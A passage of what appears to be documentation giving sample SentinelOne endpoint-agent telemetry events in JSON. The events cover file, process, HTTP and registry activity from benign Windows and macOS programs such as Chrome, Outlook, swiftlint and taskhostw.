"https://euce1-103.sentinelone.net" - }, - "timestamp": { - "millisecondsSinceEpoch": "1661503902148" - }, - "event_type": "fileDeletion", - "trueContext": { - "key": { - "value": "DD4C9404-F0D8-4676-84A6-5AAE17DE60ED" - } - }, - "source": { - "node": { - "key": { - "value": "27902FA0-0C08-475E-81CA-26A092441368" - } - }, - "executable": { - "node": { - "key": { - "value": "1BF67724-45F1-4B37-AE75-33B8E8CB8717" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "1658821170000" - }, - "path": "/Users/user.name/Library/Developer/Xcode/DerivedData/Styleguide-dpqerxvcypfzedayjbwgkzsoptsu/SourcePackages/artifacts/djij_build_tools_ios/SwiftLintBinary.artifactbundle/swiftlint-0.48.0-macos/bin/swiftlint", - "pUnix": "493", - "owner": { - "name": "user.name" - }, - "sizeBytes": "61090952", - "signature": { - "unsigned": {} - }, - "isKernelModule": "E_FALSE", - "hashes": { - "sha1": "88bd62f8a3ee159d4f4611b324073d1e56ef76de", - "sha256": "03298adf7dae5700891033ddeabecea7f5850fedefadfa9fa6ba389a38ba354f", - "md5": "7180a848026de2bef01fb7383bd03ba0" - }, - "fileLocation": "Local" - }, - "commandLine": "/Users/user.name/Library/Developer/Xcode/DerivedData/Styleguide-dpqerxvcypfzedayjbwgkzsoptsu/SourcePackages/artifacts/djij_build_tools_ios/SwiftLintBinary.artifactbundle/swiftlint-0.48.0-macos/bin/swiftlint lint --in-process-sourcekit --config /Users/user.name/Library/Developer/Xcode/DerivedData/Styleguide-dpqerxvcypfzedayjbwgkzsoptsu/SourcePackages/plugins/Styleguide.output/Styleguide/SwiftLintPlugin/swiftlint.yml /Users/user.name/Documents/Development/djij/djij_design_system_ios/Styleguide", - "fullPid": { - "pid": 6933, - "startTime": { - "millisecondsSinceEpoch": "1661503902034" - } - }, - "user": { - "name": "user.name" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "79B3CD05-F827-45CB-A898-B647D8409A3D" - } - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "swiftlint", - "root": "E_FALSE", - "isWow64": 
"E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "DD4C9404-F0D8-4676-84A6-5AAE17DE60ED" - } - } - }, - "targetFile": { - "node": { - "key": { - "value": "024A7D89-2663-48AF-9DF4-C95494454E37" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "1661503902152" - }, - "path": "/private/var/folders/0p/64nt8k313tl8klsphkkcmcjm2rrkq9/T/TemporaryItems/NSIRD_swiftlint_sBHQwy/ff558ca8ac21977f6850e3a3a719ed4f.plist", - "owner": {}, - "isKernelModule": "E_FALSE", - "hashes": {} - } - } - ``` - - - -=== "file_modification" - - - ```json - { - "meta": { - "uuid": "f63008e522ce40c9afd4348634b5ab3b", - "traceId": "01FFJC477DKY75XNH1KZPNVR44", - "agentVersion": "S1-WIN/21.7.1.240", - "osFamily": "windows", - "osName": "Windows 10 Pro", - "osRevision": "19042", - "computerName": "LAPTOP-TECH20", - "machineType": "laptop", - "mgmtUrl": "https://euce1-110-nfr.sentinelone.net" - }, - "timestamp": { - "millisecondsSinceEpoch": "1631630506789" - }, - "event_type": "fileModification", - "trueContext": { - "key": { - "value": "6B188EE5E8C5F24F" - } - }, - "source": { - "node": { - "key": { - "value": "B3B1945F1C32FBE0" - } - }, - "executable": { - "node": { - "key": { - "value": "05893E5943D0005C" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "1630573198477" - }, - "path": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "2465624", - "signature": { - "signed": { - "identity": "GOOGLE LLC", - "valid": {} - } - }, - "hashes": { - "sha1": "a82705f4f5d1408f7c14d16a9cbe26c509422b29", - "sha256": "07832d5f6344bd4d68376a6ca3c5baabb9cef7166a3752268e73fadffb07ddff", - "md5": "a766188d75e570ea3f9b09fb9d82cb54" - }, - "fileLocation": "Local" - }, - "commandLine": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1744,7600736140352570522,3112921143749416041,131072 --lang=fr 
--service-sandbox-type=none --mojo-platform-channel-handle=2092 /prefetch:8", - "fullPid": { - "pid": 17924, - "startTime": { - "millisecondsSinceEpoch": "1631516877934" - } - }, - "user": { - "name": "CORP\\user.name", - "sid": "S-1-5-21-3542462677-1213864171-2030164332-6187" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "0D7A69B0C2C26E73" - } - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "Google Chrome", - "root": "E_FALSE", - "subsystem": "SYS_WIN32", - "sessionId": 1, - "integrityLevel": "MEDIUM", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "6B188EE5E8C5F24F" - } - }, - "counters": { - "moduleLoad": 237, - "fileCreation": 15609, - "fileDeletion": 10968, - "fileModification": 25519, - "netConnOut": 7312, - "dnsLookups": 5131 - } - }, - "file": { - "node": { - "key": { - "value": "11B30D7B6C017731" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "1631630506782" - }, - "path": "C:\\Users\\user.name.CORP\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\TransportSecurity", - "owner": {}, - "isDir": "E_FALSE", - "hashes": {}, - "fileLocation": "Local" - }, - "isKernelModule": "E_FALSE", - "hashes": {}, - "oldHashes": {} - } - ``` - - - -=== "file_modification2" - - - ```json - { - "meta": { - "uuid": "123", - "traceId": "123", - "agentVersion": "S1-WIN/21.7.7.40005", - "osFamily": "windows", - "osName": "Windows Server 2019 Datacenter", - "osRevision": "17763", - "computerName": "123", - "machineType": "server", - "mgmtUrl": "https://foo.sentinelone.net" - }, - "timestamp": { - "millisecondsSinceEpoch": "1660727671759" - }, - "event_type": "fileModification", - "trueContext": { - "key": { - "value": "07CF4F73FE08319F" - } - }, - "source": { - "node": { - "key": { - "value": "AB20B9FDBC53D9F5" - } - }, - "executable": { - "node": { - "key": { - "value": "5B336EB7F6C58E57" - } - }, - "creationTime": { - 
"millisecondsSinceEpoch": "18446732429235951616" - }, - "path": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "26624", - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS", - "valid": {} - } - }, - "hashes": { - "sha1": "447ec979c4b2c53c21b17bd9c2f7d67a9f967108", - "sha256": "1eb51ea7407f41bc212cc699e37727ad6e6d52ec6746119ea066bd901f5e143b", - "md5": "0406e327338ccea5ef7dcf58268a8bfe" - }, - "fileLocation": "Local" - }, - "commandLine": "c:\\windows\\system32\\inetsrv\\w3wp.exe -ap \"STATISTIQUES\" -v \"v4.0\" -l \"webengine4.dll\" -a \\\\.\\pipe\\iisipm21bdf632-40c6-4b01-aa13-238d4c12d066 -h \"C:\\inetpub\\temp\\apppools\\STATISTIQUES\\STATISTIQUES.config\" -w \"\" -m 0 -t 20 -ta 0", - "fullPid": { - "pid": 3748, - "startTime": { - "millisecondsSinceEpoch": "1660716764710" - } - }, - "user": { - "name": "123\\foo.statistiques", - "sid": "S-1-5-21-4154652123-1702891081-745747720-13627" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "38A3CC9C5229D1BD" - } - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "IIS Worker Process", - "root": "E_TRUE", - "subsystem": "SYS_WIN32", - "integrityLevel": "HIGH", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "07CF4F73FE08319F" - } - }, - "counters": { - "moduleLoad": 5585, - "fileCreation": 1960, - "fileDeletion": 34, - "fileModification": 4055, - "netConnOut": 96, - "dnsLookups": 72 - } - }, - "file": { - "node": { - "key": { - "value": "CA4F23B11D816C71" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "1660727671758" - }, - "path": "Anonymized Data", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "1075", - "hashes": { - "sha1": "9045966e5e375754d7789d487996d0314b5f77e1", - "sha256": "28cd1440f5b4f5c0d7cdbfbe4a02254cda1a87fbdddf3145faa4d5282d013f1d", - "md5": "2e63349a674acda41d8e1dcbff91b209" - }, - "fileLocation": "Local" - 
}, - "sizeBytes": "1075", - "isKernelModule": "E_FALSE", - "hashes": {}, - "oldHashes": {} - } - ``` - - - -=== "http" - - - ```json - { - "meta": { - "seqId": 1, - "uuid": "3d923fd8f09b44f4973579043a3c8df3", - "traceId": "33AEAAEA73CD4989976C65DA8123C361", - "agentVersion": "S1-WIN/21.5.7.370", - "osFamily": "windows", - "osName": "Windows 10 Pro", - "osRevision": "19043", - "computerName": "LAPTOP-TECH10", - "machineType": "laptop", - "mgmtUrl": "https://euce1-110-nfr.sentinelone.net" - }, - "timestamp": { - "millisecondsSinceEpoch": "1631784929904" - }, - "event_type": "http", - "trueContext": { - "key": { - "value": "A1FFB5A30161CDC0" - } - }, - "source": { - "node": { - "key": { - "value": "28C500988B415CA1" - } - }, - "executable": { - "node": { - "key": { - "value": "96C577BBA6378545" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "18446732429235951616" - }, - "path": "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "42156856", - "signature": { - "signed": { - "identity": "MICROSOFT CORPORATION", - "valid": {} - } - }, - "hashes": { - "sha1": "676b4e6a3c2c06fd7df3b83527a5570fd6687c8f", - "sha256": "97564d2938bebaaf1741fe5f675366cf1d8d3b6328fe38a5cf8e7133fe533ed1", - "md5": "bafa8a3a020648b57622e0b79104468a" - }, - "fileLocation": "Local" - }, - "commandLine": "\"C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE\"", - "fullPid": { - "pid": 14144, - "startTime": { - "millisecondsSinceEpoch": "1631775730819" - } - }, - "user": { - "name": "CORP\\m.benyounes", - "sid": "S-1-5-21-3542462677-1213864171-2030164332-6195" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "8299EFA6DE45855B" - } - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "Microsoft Outlook", - "root": "E_TRUE", - "subsystem": "SYS_WIN32", - "sessionId": 1, - "integrityLevel": "MEDIUM", - "isWow64": "E_FALSE", - 
"isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "A1FFB5A30161CDC0" - } - }, - "counters": { - "modelChildProcess": 4, - "osChildProcess": 2, - "moduleLoad": 4102, - "fileCreation": 522, - "fileDeletion": 441, - "fileModification": 1211, - "netConnOut": 235, - "registryModification": 7596, - "dnsLookups": 81 - } - }, - "sourceType": "WININET", - "url": "https://automation.alticap.com/media/images/1548943185788.jpg?foo=bar#frag", - "method": "GET" - } - ``` - - - -=== "open_process" - - - ```json - { - "meta": { - "seqId": 63, - "uuid": "bcc4bf7a284441599707050e1d58a8dd", - "traceId": "CEBBC94D38B041B1B2DE01C315EB28F5", - "agentVersion": "S1-WIN/21.5.7.370", - "osFamily": "windows", - "osName": "Windows 10 Pro", - "osRevision": "19042", - "computerName": "LAPTOP-TECH15", - "machineType": "laptop", - "mgmtUrl": "https://euce1-110-nfr.sentinelone.net" - }, - "timestamp": { - "millisecondsSinceEpoch": "1631634712102" - }, - "event_type": "openProcess", - "source": { - "node": { - "key": { - "value": "2A2CC1C3468CB3D8" - } - }, - "executable": { - "node": { - "key": { - "value": "1F70F08D24687577" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "18446732429235951616" - }, - "path": "C:\\WINDOWS\\system32\\lsass.exe", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "59448", - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS PUBLISHER", - "valid": {} - } - }, - "hashes": { - "sha1": "28f7fb54c7bcd9d6e71669ea5bddf72ea65311ce", - "sha256": "362ab9743ff5d0f95831306a780fc3e418990f535013c80212dd85cb88ef7427", - "md5": "15a556def233f112d127025ab51ac2d3" - }, - "fileLocation": "Local" - }, - "commandLine": "C:\\WINDOWS\\system32\\lsass.exe", - "fullPid": { - "pid": 992, - "startTime": { - "millisecondsSinceEpoch": "1630919462523" - } - }, - "user": { - "name": "AUTORITE NT\\Syst\u00e8me", - "sid": "S-1-5-18" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "611EAD3E998CF40A" - } - }, - 
"executable": { - "node": { - "key": { - "value": "E2ABEBDC5F08F279" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "18446732429235951616" - }, - "path": "C:\\WINDOWS\\system32\\wininit.exe", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "419432", - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS PUBLISHER", - "valid": {} - } - }, - "hashes": { - "sha1": "915ea28bdaa9a2230ce52080693d7f7e27620ed5", - "sha256": "268ca325c8f12e68b6728ff24d6536030aab6e05603d0179033b1e51d8476d86", - "md5": "9ef51c8ad595c5e2a123c06ad39fccd7" - }, - "fileLocation": "Local" - }, - "commandLine": "wininit.exe", - "fullPid": { - "pid": 900, - "startTime": { - "millisecondsSinceEpoch": "1630919462470" - } - }, - "user": { - "name": "AUTORITE NT\\Syst\u00e8me", - "sid": "S-1-5-18" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "0D332A871A7DB912" - } - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "Windows Start-Up Application", - "root": "E_TRUE", - "subsystem": "SYS_WIN32", - "integrityLevel": "SYSTEM", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "5318E7F038459CED" - } - } - }, - "excluded": "E_FALSE", - "name": "Local Security Authority Process", - "root": "E_TRUE", - "subsystem": "SYS_WIN32", - "integrityLevel": "SYSTEM", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "A2DC49811AF8CC72" - } - }, - "counters": { - "crossProcess": 5262, - "moduleLoad": 222, - "netConnOut": 1813, - "crossProcessOutOfGroup": 5262, - "crossProcessOpenProcess": 5262, - "dnsLookups": 51 - } - }, - "target": { - "node": { - "key": { - "value": "E94742BA9CF1A186" - } - }, - "executable": { - "node": { - "key": { - "value": "23FF6C2F651EEA11" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "18446732429235951616" - }, - "path": "C:\\WINDOWS\\system32\\taskhostw.exe", - "owner": {}, - 
"isDir": "E_FALSE", - "sizeBytes": "97096", - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS", - "valid": {} - } - }, - "hashes": { - "sha1": "fed4b4a753a9541389aa670c69e624be07569ccd", - "sha256": "0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad", - "md5": "564e4806ab18f93b93d551cd10c1598e" - }, - "fileLocation": "Local" - }, - "commandLine": "taskhostw.exe Install $(Arg0)", - "fullPid": { - "pid": 15728, - "startTime": { - "millisecondsSinceEpoch": "1631634711621" - } - }, - "user": { - "name": "CORP\\j.varinot", - "sid": "S-1-5-21-3542462677-1213864171-2030164332-6152" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "399C73C0494DC82C" - } - }, - "executable": { - "node": { - "key": { - "value": "92BFF1D465C6BF8D" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "18446732429235951616" - }, - "path": "C:\\WINDOWS\\system32\\svchost.exe", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "57360", - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS PUBLISHER", - "valid": {} - } - }, - "hashes": { - "sha1": "010db07461e45b41c886192df6fd425ba8d42d82", - "sha256": "643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7", - "md5": "f586835082f632dc8d9404d83bc16316" - }, - "fileLocation": "Local" - }, - "commandLine": "C:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule", - "fullPid": { - "pid": 1928, - "startTime": { - "millisecondsSinceEpoch": "1630919463114" - } - }, - "user": { - "name": "AUTORITE NT\\Syst\u00e8me", - "sid": "S-1-5-18" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "D382137395ABA2C4" - } - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "Host Process for Windows Services", - "root": "E_TRUE", - "subsystem": "SYS_WIN32", - "integrityLevel": "SYSTEM", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "4F9F0BD86D6CFE40" - } - 
}, - "counters": { - "modelChildProcess": 1596, - "osChildProcess": 1596, - "crossProcess": 63, - "moduleLoad": 81, - "crossProcessOutOfGroup": 63, - "crossProcessOpenProcess": 63 - } - }, - "excluded": "E_FALSE", - "name": "Host Process for Windows Tasks", - "root": "E_TRUE", - "subsystem": "SYS_WIN32", - "sessionId": 7, - "integrityLevel": "MEDIUM", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "AB55C980E679578F" - } - }, - "counters": { - "moduleLoad": 44 - } - }, - "desiredAccess": 5240, - "relations": "PR_OTHER" - } - ``` - - - -=== "process_creation" - - - ```json - { - "meta": { - "seqId": 51, - "uuid": "19f22913365942f2afeed1463c96104b", - "traceId": "620565A45ABA475FB419254BE2152CA4", - "agentVersion": "S1-WIN/21.5.7.370", - "osFamily": "windows", - "osName": "Windows 10 Pro", - "osRevision": "19042", - "computerName": "LAPTOP-COM11", - "machineType": "laptop", - "mgmtUrl": "https://euce1-110-nfr.sentinelone.net" - }, - "timestamp": { - "millisecondsSinceEpoch": "1631630507153" - }, - "event_type": "processCreation", - "trueContext": { - "key": { - "value": "03E80496A6DE3247" - } - }, - "process": { - "node": { - "key": { - "value": "F85B96F9DB3700A5" - } - }, - "executable": { - "node": { - "key": { - "value": "7543AA6F061EE014" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "18446732429235951616" - }, - "path": "C:\\Windows\\System32\\taskhostw.exe", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "97096", - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS", - "valid": {} - } - }, - "hashes": { - "sha1": "fed4b4a753a9541389aa670c69e624be07569ccd", - "sha256": "0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad", - "md5": "564e4806ab18f93b93d551cd10c1598e" - }, - "fileLocation": "Local" - }, - "commandLine": "taskhostw.exe Install $(Arg0)", - "fullPid": { - "pid": 15104, - "startTime": { - "millisecondsSinceEpoch": "1631630506706" - } - }, - "user": { 
- "name": "CORP\\l.maoui", - "sid": "S-1-5-21-3542462677-1213864171-2030164332-6168" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "BAA63DA271B07548" - } - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "Host Process for Windows Tasks", - "root": "E_TRUE", - "subsystem": "SYS_WIN32", - "sessionId": 10, - "integrityLevel": "MEDIUM", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "03E80496A6DE3247" - } - }, - "counters": { - "moduleLoad": 44 - } - }, - "parent": { - "node": { - "key": { - "value": "BAA63DA271B07548" - } - }, - "executable": { - "node": { - "key": { - "value": "03708471A478DAC3" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "18446732429235951616" - }, - "path": "C:\\Windows\\System32\\svchost.exe", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "57360", - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS PUBLISHER", - "valid": {} - } - }, - "hashes": { - "sha1": "010db07461e45b41c886192df6fd425ba8d42d82", - "sha256": "643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7", - "md5": "f586835082f632dc8d9404d83bc16316" - }, - "fileLocation": "Local" - }, - "commandLine": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule", - "fullPid": { - "pid": 1900, - "startTime": { - "millisecondsSinceEpoch": "1630857368855" - } - }, - "user": { - "name": "AUTORITE NT\\Syst\u00e8me", - "sid": "S-1-5-18" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "C36E5F6CB1EFE1FA" - } - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "Host Process for Windows Services", - "root": "E_TRUE", - "subsystem": "SYS_WIN32", - "integrityLevel": "SYSTEM", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "A27D4C3AA2A4C77B" - } - }, - "counters": { - "modelChildProcess": 2096, - 
"osChildProcess": 2096, - "crossProcess": 324, - "moduleLoad": 80, - "crossProcessOutOfGroup": 324, - "crossProcessOpenProcess": 324 - } - }, - "hashes": { - "sha1": "fed4b4a753a9541389aa670c69e624be07569ccd", - "sha256": "0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad", - "md5": "564e4806ab18f93b93d551cd10c1598e" - }, - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS", - "valid": {} - } - } - } - ``` - - - -=== "process_exit" - - - ```json - { - "meta": { - "seqId": 102, - "uuid": "e4fb82d7034d4d8983f8f9e103aa394b", - "traceId": "AEA057B816964BDF82E0E2EC171B0C10", - "agentVersion": "S1-WIN/21.5.7.370", - "osFamily": "windows", - "osName": "Windows 10 Pro", - "osRevision": "19043", - "computerName": "LAPTOP-COM08", - "machineType": "laptop", - "mgmtUrl": "https://euce1-110-nfr.sentinelone.net" - }, - "timestamp": { - "millisecondsSinceEpoch": "1631634704684" - }, - "event_type": "processExit", - "trueContext": { - "key": { - "value": "3B49B9603DFF38C9" - } - }, - "source": { - "node": { - "key": { - "value": "03B4B5C3910B72FF" - } - }, - "executable": { - "node": { - "key": { - "value": "31E86945F742D096" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "18446732429235951616" - }, - "path": "C:\\WINDOWS\\System32\\wermgr.exe", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "228680", - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS", - "valid": {} - } - }, - "hashes": { - "sha1": "573ad9af63a6a0ab9b209ece518fd582b54cfef5", - "sha256": "1c09759dcd31fdc81bcd6685438d7efb34e0229f1096bfd57d41ecfe614d07dc", - "md5": "f7991343cf02ed92cb59f394e8b89f1f" - }, - "fileLocation": "Local" - }, - "commandLine": "C:\\WINDOWS\\system32\\wermgr.exe -upload", - "fullPid": { - "pid": 9876, - "startTime": { - "millisecondsSinceEpoch": "1631634703718" - } - }, - "user": { - "name": "AUTORITE NT\\Syst\u00e8me", - "sid": "S-1-5-18" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "6308FCA4876DA87C" 
- } - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "Windows Problem Reporting", - "root": "E_TRUE", - "subsystem": "SYS_WIN32", - "integrityLevel": "SYSTEM", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "3B49B9603DFF38C9" - } - }, - "counters": { - "moduleLoad": 212 - } - }, - "parent": { - "node": { - "key": { - "value": "6308FCA4876DA87C" - } - }, - "executable": { - "node": { - "key": { - "value": "B10478282C996149" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "18446732429235951616" - }, - "path": "C:\\WINDOWS\\System32\\svchost.exe", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "57360", - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS PUBLISHER", - "valid": {} - } - }, - "hashes": { - "sha1": "010db07461e45b41c886192df6fd425ba8d42d82", - "sha256": "643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7", - "md5": "f586835082f632dc8d9404d83bc16316" - }, - "fileLocation": "Local" - }, - "commandLine": "C:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule", - "fullPid": { - "pid": 1744, - "startTime": { - "millisecondsSinceEpoch": "1631022021170" - } - }, - "user": { - "name": "AUTORITE NT\\Syst\u00e8me", - "sid": "S-1-5-18" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "6B6B39C296E3FD3D" - } - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "Host Process for Windows Services", - "root": "E_TRUE", - "subsystem": "SYS_WIN32", - "integrityLevel": "SYSTEM", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "D4ADBE51EE6EC2D0" - } - }, - "counters": { - "modelChildProcess": 1095, - "osChildProcess": 1095, - "crossProcess": 39, - "moduleLoad": 80, - "crossProcessOutOfGroup": 39, - "crossProcessOpenProcess": 39 - } - } - } - ``` - - - -=== "reg_key_security_changed" - - - ```json - { - "meta": { - 
"seqId": 10, - "uuid": "bfd21e8929fd49768299fae02a0557a6", - "traceId": "7892FB424053407899299D5319FEB9C5", - "agentVersion": "S1-WIN/21.5.7.370", - "osFamily": "windows", - "osName": "Windows 10 Pro", - "osRevision": "19042", - "computerName": "LAPTOP-TECH19", - "machineType": "laptop", - "mgmtUrl": "https://euce1-110-nfr.sentinelone.net" - }, - "timestamp": { - "millisecondsSinceEpoch": "1631785108303" - }, - "event_type": "regKeySecurityChanged", - "trueContext": { - "key": { - "value": "D1A7307582B51DFF" - } - }, - "regKey": { - "key": {}, - "path": "MACHINE\\BCD00000000\\Objects\\{9dea862c-5cdd-4e70-acc1-f32b344d4795}\\Elements\\11000001" - }, - "securityInformation": 4, - "source": { - "node": { - "key": { - "value": "C02A3567256C6DE9" - } - }, - "executable": { - "node": { - "key": { - "value": "61D0DBC75EA434C4" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "18446732429235951616" - }, - "path": "C:\\Windows\\system32\\taskhostw.exe", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "97096", - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS", - "valid": {} - } - }, - "hashes": { - "sha1": "fed4b4a753a9541389aa670c69e624be07569ccd", - "sha256": "0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad", - "md5": "564e4806ab18f93b93d551cd10c1598e" - }, - "fileLocation": "Local" - }, - "commandLine": "taskhostw.exe", - "fullPid": { - "pid": 25104, - "startTime": { - "millisecondsSinceEpoch": "1631775524677" - } - }, - "user": { - "name": "CORP\\user.name", - "sid": "S-1-5-21-3542462677-1213864171-2030164332-6186" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "7A33A49AFDF1C571" - } - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "Host Process for Windows Tasks", - "root": "E_FALSE", - "subsystem": "SYS_WIN32", - "sessionId": 15, - "integrityLevel": "HIGH", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - 
"value": "D1A7307582B51DFF" - } - }, - "counters": { - "moduleLoad": 52 - } - } - } - ``` - - - -=== "reg_value_create" - - - ```json - { - "meta": { - "seqId": 10, - "uuid": "bfd21e8929fd49768299fae02a0557a6", - "traceId": "7892FB424053407899299D5319FEB9C5", - "agentVersion": "S1-WIN/21.5.7.370", - "osFamily": "windows", - "osName": "Windows 10 Pro", - "osRevision": "19042", - "computerName": "LAPTOP-TECH19", - "machineType": "laptop", - "mgmtUrl": "https://euce1-110-nfr.sentinelone.net" - }, - "timestamp": { - "millisecondsSinceEpoch": "1631785108304" - }, - "event_type": "regValueCreate", - "trueContext": { - "key": { - "value": "D1A7307582B51DFF" - } - }, - "regValue": { - "key": {}, - "path": "MACHINE\\BCD00000000\\Objects\\{9dea862c-5cdd-4e70-acc1-f32b344d4795}\\Elements\\12000002\\Element" - }, - "valueType": 1, - "source": { - "node": { - "key": { - "value": "C02A3567256C6DE9" - } - }, - "executable": { - "node": { - "key": { - "value": "61D0DBC75EA434C4" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "18446732429235951616" - }, - "path": "C:\\Windows\\system32\\taskhostw.exe", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "97096", - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS", - "valid": {} - } - }, - "hashes": { - "sha1": "fed4b4a753a9541389aa670c69e624be07569ccd", - "sha256": "0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad", - "md5": "564e4806ab18f93b93d551cd10c1598e" - }, - "fileLocation": "Local" - }, - "commandLine": "taskhostw.exe", - "fullPid": { - "pid": 25104, - "startTime": { - "millisecondsSinceEpoch": "1631775524677" - } - }, - "user": { - "name": "CORP\\user.name", - "sid": "S-1-5-21-3542462677-1213864171-2030164332-6186" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "7A33A49AFDF1C571" - } - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "Host Process for Windows Tasks", - "root": "E_FALSE", - "subsystem": "SYS_WIN32", - 
